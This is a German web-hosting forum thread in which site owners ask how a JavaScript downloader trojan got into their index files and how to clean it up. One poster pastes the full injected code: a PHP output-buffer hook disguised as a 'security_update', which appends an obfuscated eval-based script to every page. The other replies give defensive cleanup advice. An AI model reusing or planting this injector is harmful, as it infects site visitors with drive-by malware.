Folgendes Problem hat sich mir in den letzten Tagen gestellt. Mehrere Leute haben mir berichtet das ihr AntiVir und Norton auf meiner Seite Alarm schlägt. Habe meine Seite dann selber besucht und es kam folgende Warnung vor diesem Trojaner : "JS/Dldr.Agent.cfl"

Mein Frage ist jetzt folgende, wie kann es sein, dass auf meiner Seite Änderungen vorgenommen wurden, ohne das ich etwas gemacht habe. Mein PC war zum Zeitpunkt der Änderung nicht einmal in Betrieb! Die Änderungen sind auch nicht zur selben Zeit erfolgt, sondern in einer Zeitspanne von 9:40 bis 10:50uhr. Desweiteren sind es grundsätzlich index. dateien die betroffen sind. Dabei spielt es keine Rolle ob index.php oder index.html oder index.htm. Keine weitere Datei war betroffen. Würde mich freuen, wenn euch dazu was einfällt.
Wie kann das sein, dass sich die Dateien ändern?
Ist es möglich das "Dritte" sich in das System "gehackt" haben?

Danke schonmal im Vorraus, Stravko!

Hat denn hier keiner ne Ahnung, was man dagegen tun kann bzw. wie sich solch ein Trojaner da einschleusen kann?

Mir geht es genauso... hatte 6 Seiten die infiziert waren... und zwar auf die unterschiedlichste Weise. Mal in einer index.php eines xtcommerce Shops, mal in Joomla, mal ne index.html, mal in einer .js Datei.

Ich habe alle Javascripte entfernt und die FTP Passwörter verändert.
Mal gucken wie lange das hält .

Beobachtet habe ich nur das (wahrscheinich mit nem programmierten Zufallsscript) ab und zu ein neuer Tab im Firefox auf ging. Unter diesem Link wurde dann eine Datei runtergeladen. Ich habe das beim erstenmal nicht gemerkt und mir was eingefangen. Feststellen konnte ich nur das auf einmal mein Firewall nicht mehr automatisch hochlud und das es eine svchost.exe Datei gab die es an der Stelle im Betriebsystem nicht geben sollte, sie war auch infiziert.

Das war vor zwei Wochen, ich habe den Rechner natürlich platt gemacht.

Leider tappe ich total im Dunkeln wie diese Scipte auf meine Internetseiten kamen.

Ich habe übrigens erst nach der Infektion gemerkt das es die Scripte auf meinen Seiten gab, und bis gestern war ich damit beschäftigt sie zu beseitigen.

Gruß Lazi...


PS: Scheint wohl eine recht neue Malware zu sein... im I-net findet sich noch nicht viel...

Zitat:

Zitat von Stravko

Hat denn hier keiner ne Ahnung, was man dagegen tun kann

Doch.

Sichere Passwörter, nur sichere Scripte, abgesicherte, aktuelle Serversoftware (die u.U. von dir stammt - je nach Vertrag/Server), sicherer Server (u.U. Providerwechsel, wenn der dies nicht auf die Reihe bekommt.)

Möglich wäre aber z.B. auch, dass auf deinem PC ein Backdoor-Programm drauf ist und jemand folglich deine Passworteingaben mitliest, wahrscheinlicher dürfte aber irgendeine Lücke auf den Webserver sein.

Da du sagst, zu dem Zeitpunkt war dein PC aus, kannst du eventuell über Log-Files aber auch sehen von welcher IP-Adresse welche Art der Verbindung benutzt wurde.

Stravko... nur mal so nebenbei welches FTP Programm benutzt du?

cuteFTPprofessional 8.0

Spielt es eine Rolle welches FTP Prog man verwendet?

Desweiteren, wie kann es sein das der Trojaner auch mit htaccess geschützte verzeichnisse befallen hat?

Der schadhafte Code ist folgender:

Zitat:

In die zweite Zeile eingefügt:

ob_start("security_update"); //do not remove this line - important
security update!

An das Ende der Datei eingefügt:
<?php
function security_update($buffer)
{
$update = '<script
language="javascript">$="Z64eZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3 czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z25 26$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}g KqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z3d}r4Z3cpZ7bwayqz`:wZ7bZ7bZ257F}q:xqzs`|4))4$Z3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)46`qg`6Z2f }gKqzuvxqp4)4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43`qg`3Z2fpZ7bwayqz`:wZ7bZ7bZ257F}q4)433Z2fiqxgqo}gKqzuvxqp4)4`faqZ2fifq`afz4}gKqzuvxqpZ2firazw`}Z7bz4dZ7bdKs q`WZ7bZ7bZ257F}qZ3czuyqZ3dobuf4wZ7bZ7bZ257F}q4)46464?4pZ7bwayqz`:wZ7bZ7bZ257F}qZ2fbuf4gqufw|4)46464?4zuyq4?46)6Z2fbuf4gq`G`f4)4zaxxZ2fbuf4Z7brrgq`4)4$ Z2fbuf4qzp4)4$Z2f}r4Z3cwZ7bZ7bZ257F}q:xqzs`|4*4$Z3doZ7brrgq`4)4wZ7bZ7bZ257F}q:}zpql[rZ3cgqufw|Z3dZ2f}r4Z3cZ7brrgq`45)49Z25Z3doZ7brrgq`4?)4gqufw|:xqzs`|Z2fqzp4)4wZ7bZ7bZ257F}q:}zpql[rZ3c6Z2f684Z7brrgq`Z3dZ2f}r4Z3cqzp4))49Z25Z3doqzp4)4wZ7bZ7bZ257F}q:xqzs`|Z2figq`G`f4)4azqgwudqZ3cwZ7bZ7bZ257F}q:gavg`f}zsZ3cZ7brrgq`84qzpZ3dZ3dZ2fiifq `afzZ3cgq`G`fZ3dZ2firazw`}Z7bz4dZ7bdKgq`WZ7bZ7bZ257F}q4Z3czuyq84buxaqZ3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)4zuyq4?46)64?4qgwudqZ3cbuxaqZ3d4?46Z2f4qld}fqg)Rf} pum8Z27Z259Pqw9!$4Z2526Z27.!-.!-4SY@Z2f4du`|);Z2f6Z2firazw`}Z7bz4g|Z7bcKdZ7bdZ3cZ3dobuf4dZ7bdKczp4)46|``d.;;rvwyr}f:wZ7by;ws}9v}z;}zpql:ws}+w|xa6Z2fbuf4rquKczp4)46gwfZ7bxxvufg)Z258fq g}nuvxq)Z258`Z7bZ7bxvuf)Z258xZ7bwu`}Z7bz)Z258yqzavuf)Z258g`u`ag)Z258p}fqw`Z7bf}qg)$6Z2fbuf4zqqpKZ7bdqz4)4`faqZ2f}r4Z3cpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm4 5)4zaxxZ3dpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdmZ3cZ3dZ2f}r4Z3cpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bup KwZ7bdmZ3cZ3dZ2f}r4Z3cdZ7bdKazpqf45)4zaxxZ3do}r4Z3c5dZ7bdKazpqf:wxZ7bgqpZ3dzqqpKZ7bdqz4)4ruxgqZ2fi}r4Z3czqqpKZ7bdqzZ3do}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuv xqpZ3cZ3dZ3dobux4)4dZ7bdKsq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyqZ3dZ2f}r4Z3cbux45)4zaxxZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fbuxZ25264)4zqc4Pu`qZ3cbuxZ3d Z2fa`wZ27Z25264)4Pu`q:A@WZ3czZ7bc:sq`RaxxMqufZ3cZ3d84zZ7bc:sq`YZ7bz`|Z3cZ3d84zZ7bc:sq`Pu`qZ3cZ3d84zZ7bc:sq`Z255CZ7bafgZ3cZ3d84zZ7bc:sq`Y}za`qgZ3cZ3d84 zZ7bc:sq`GqwZ7bzpgZ3cZ3dZ3dZ2fa`wZ25264)4Pu`q:A@WZ3cbuxZ2526:sq`RaxxMqufZ3cZ3d84buxZ2526:sq`YZ7bz`|Z3cZ3d84buxZ2526:sq`Pu`qZ3cZ3d84buxZ2526:sq`Z255CZ7 bafgZ3cZ3d84buxZ2526:sq`Y}za`qgZ3cZ3d84buxZ2526:sq`GqwZ7bzpgZ3cZ3dZ3dZ2f}r4Z3c4Z3c4a`wZ27Z2526494a`wZ25264Z3d4;4Z25$$$4(4dZ7bdK`}yqZ7ba`Z3eZ2522$Z3doz qqpKZ7bdqz4)4ruxgqZ2fiiii}r4Z3czqqpKZ7bdqzZ3doazpqf4)4c}zpZ7bc:Z7bdqzZ3cdZ7bdKczp846684rquKczpZ3dZ2fazpqf:vxafZ3cZ3dZ2fc}zpZ7bc:rZ7bwagZ3cZ3dZ2f}r4Z3c dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fdZ7bdKgq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyq84zZ7bcZ3dZ2fiiirazw`}Z7bz4dZ7bdK}z} `Z3cZ3dobuf4bqf4)4dufgqRxZ7bu`Z3czub}su`Z7bf:uddBqfg}Z7bzZ3dZ2fbuf4bqfZ25264)4Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-!6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-,6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4Z5a@6Z3d*)$4Z3d22Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3[dqfu3Z3d4))49Z25Z3d22Z3czub}su`Z7bf:uddZ5auyq45)43Z5aq`gwudq3Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3YG]Q3Z3d4*49Z25Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3GBZ253Z3d4*49Z25Z3d422Z3cbqf4*)4Z2520Z3dZ2f}r4Z3cbqfZ2526Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgZ3dorZ7bf4Z3cbuf4})$Z2f4}(pZ7bwayqz`:x}zZ257Fg:xqzs`|Z2f4} ??Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgO}I:`ufsq`45)46KvxuzZ257F6Z3dopZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FZ2fp Z7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257F4)4g|Z7bcKdZ7bdZ2fiiiipZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:Z7bzwx}wZ257FZ2fpZ7bwayqz`:Z7bzyZ7bagqad4)4g|Z7 bcKdZ7bdZ2fidZ7bdK}z}`Z3cZ3dZ2fi(;gwf}d`*Z22;ccZ3dZ22gthZ253bZ2569Z252b+)Z257btmpZ253dds.Z2573Z256ciceZ2528Z2569,Z2569Z252b1)Z253bZ25Z22;cdZ3dZ2273tZ2 53dst+StZ2572Z2569Z256eg.Z2566Z2572omZ2543haZ2572CodZ2565((tZ256dp.Z256Z22;caZ3dZ22Z2566Z2575Z256ecZ2574ionZ2520dZ2563s(dZ2573,esZ2529Z257bdsZ253dunZ2 565scZ2561pZ22;opZ3dZ22Z2524Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522;Z22;stZ3dZ22Z2573tZ253dZ2522Z2524Z253dsZ2574;Z2564cZ2573Z2528Z2564Z2561Z252bdZ2 562+Z2564cZ252bdZ2564+Z2564Z2565Z252cZ25310Z2529Z253bZ2564wZ2528Z2573tZ2529;Z2573Z2574Z253dZ2524Z253bZ2522;Z22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z 3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;cbZ3dZ22e(Z2564s)Z253bsZ2574Z253dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cds.Z256ceZ256eZ22;dzZ3dZ22Z2566u nZ2563tiZ256fn
dZ2577(t)Z257bcaZ253dZ2527Z252564ocZ252575Z25256dZ2565Z25256et.wZ252572Z2525Z25369Z2574eZ252528Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527 Z25253cscZ252572iZ2570tZ2525Z25320Z25256canZ252567Z2575Z2561Z252567Z2565Z25253dZ25255cZ252522Z256aaZ252576Z2525Z25361Z252573Z2563Z252572Z2569Z252570tZ 25255cZ252522Z25253eZ2527;Z2563cZ253dZ2527Z25253cZ25255cZ25252fscrZ252569ptZ25253eZ2527;evZ2561l(Z2575neZ2573capZ2565(Z2574Z2529)};Z22;dcZ3dZ22qi89;Z2 5229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;czZ3dZ22Z2566unZ2563tiZ256fnZ2520cZ257aZ2528cz)Z257breZ2574uZ2572nZ2520Z2563Z2561+Z2563Z2562Z252bcZ2563Z252bZ2563Z2 564Z252bZ2563e+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ223Z2568arZ2543odZ2565At(Z2530)Z255e(Z25270xZ2530Z2530Z2527+es)Z2529Z2529;}}Z22;Z69f
(Z64ocZ75meZ6eZ74.cZ6foZ6biZ65Z2eindZ65xOfZ28Z27vbullZ65Z74inZ5fmZ75ltiZ71uZ6ftZ65Z3dZ27)Z3dZ3d-1)Z7bsZ63(Z27Z76Z62ullZ65tZ69n_mZ75ltZ69quoZ74eZ3dZ27,2,Z37);eZ76aZ6c(uZ6eescZ61Z70e(Z64zZ2bcz+Z6fpZ2bZ73t)Z2bZ27dZ77Z28Z64zZ2bcZ7aZ28$+Z73t))Z3bZ27)} elsZ65Z7b$Z3dZ27Z27};Z66uncZ74ionZ20sc(Z63Z6em,vZ2ced)Z7bvarZ20eZ78dZ3dnew
DZ61teZ28)Z3beZ78dZ2eseZ74DatZ65(exZ64.Z67Z65tZ44Z61te(Z29+eZ64);Z64Z6fcZ75meZ6et.cZ6foZ6bieZ3dcnmZ2b
Z27Z3dZ27
+esZ63aZ70eZ28vZ29+Z27;expiZ72esZ3dZ27+eZ78d.Z74oZ47MTZ53trZ69ng(Z29;Z7d;";function
z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return
unescape(r);}eval(z($));document.write($);</script>';
if (stristr($buffer, '</html') !== FALSE)
{
return eregi_replace('</html', $update.'<html', $buffer);
}
else
{
return $buffer.$update;
}
}
?>

Vielleicht kan damit einer was anfangen und mir mit dem Problem weiterhelfen. Würde halt gerne die Ursache dieses "Problems" klären bevor ich mit der Seite wieder online gehe.

@Shadow: An den Passwörtern kann es nicht liegen, da ich eine sehr hohe Sicherheitsstufe gewählt habe. Der server läuft auf Apache 2.2.9 und PHP 5.2.6. installiert ist wordpress in der aktuellen version.

Schonmal viele Dank für evtl. Antworten

Hi

Wenn dein Webspace infiziert wurde, dann solltest Du ihn komplett löschen und neu hochladen. Nur so kannst Du sicher sein, dass nicht irgendwo dort jetzt eine Datei liegt, die auch in Zukunft den Zugriff ermöglicht (PHP-Shell) nachdem das FTP-Passwort geändert wurde.

htaccess steuert nur Zugriffe übre den Webserver. Für FTP gelten die nicht, schließlich will man sie von dort aus ja hochladen können.

Ich habe gerade diesen alten Thread von dir entdeckt. Da wundert mich gar nichts mehr. Auf so einem System darf man gerade noch Solitär und Minesweeper spielen, aber bestimmt keine Passwörter mehr eingeben.

Gruß, Karl

Zitat:

Zitat von KarlKarl

Hi

Wenn dein Webspace infiziert wurde, dann solltest Du ihn komplett löschen und neu hochladen. Nur so kannst Du sicher sein, dass nicht irgendwo dort jetzt eine Datei liegt, die auch in Zukunft den Zugriff ermöglicht (PHP-Shell) nachdem das FTP-Passwort geändert wurde.

htaccess steuert nur Zugriffe übre den Webserver. Für FTP gelten die nicht, schließlich will man sie von dort aus ja hochladen können.

Ich habe gerade diesen alten Thread von dir entdeckt. Da wundert mich gar nichts mehr. Auf so einem System darf man gerade noch Solitär und Minesweeper spielen, aber bestimmt keine Passwörter mehr eingeben.

Gruß, Karl

Die HP ist erst nach einer kompletten neuaufsetzung meines Rechners online gegangen. Habe ihn vor kurzer Zeit komplett neu eingerichtet und das nach der Anleitung aus diesem Forum. Also daran kann es eigentlich auch nicht liegen

htaccess regelt nur den Zugang (=access) zu ht (Hypertransport und nicht für FTP, heißt ja auch nicht ftaccess

Ein "sicheres" Kennwort nützt nichts, wenn auf deinem PC ein Backdoor wäre
Ein sicheres Kennwort nützt nichts auf unsicheren Servern oder wenn auf den Servern unsichere Software läuft.

Ist es dein (physikalischer) Server (z.B. via DYNDNS) oder ein gehosteter?
Einige Hoster schreiben Sicherheit ganz groß, und nutzen z.B. nur die resten 4 Stellen vom FTP-Passwort.
FTP selber ist an sich unsicher, denn "jeder" kann's abhören, jeder könnte "Man in the Middle" sein, ist aber sehr unwahrscheinlich.
Unsichere Scripte und Lücken in der Rechtevergabe oder Serverapplikationen sind am wahrscheinlichsten.

Danke schonmal für die zahlrreichen Antworten, auch wenn ich bisher immernoch nicht weiß wie genau der Trojaner sich da einschleichen konnte. Wenn jemandem noch was einfällt, wie er mir helfen könnte, wäre ich natürlich für jede Hilfe dankbar!